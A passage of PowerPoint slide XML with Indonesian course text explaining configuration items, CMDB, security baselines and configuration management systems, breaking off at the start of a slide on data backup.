              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, proses, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkontribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Item </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> label, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>idealnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konvensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penamaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. CI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hubungannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CMDB).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipatuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> minimum yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CMS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan basis data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melaporkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CI. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> spreadsheet dan diagram, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinvestasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Diagram </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elemen-elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Diagram </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengilustrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IP) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan tata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>letak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</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153</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343091995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Pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
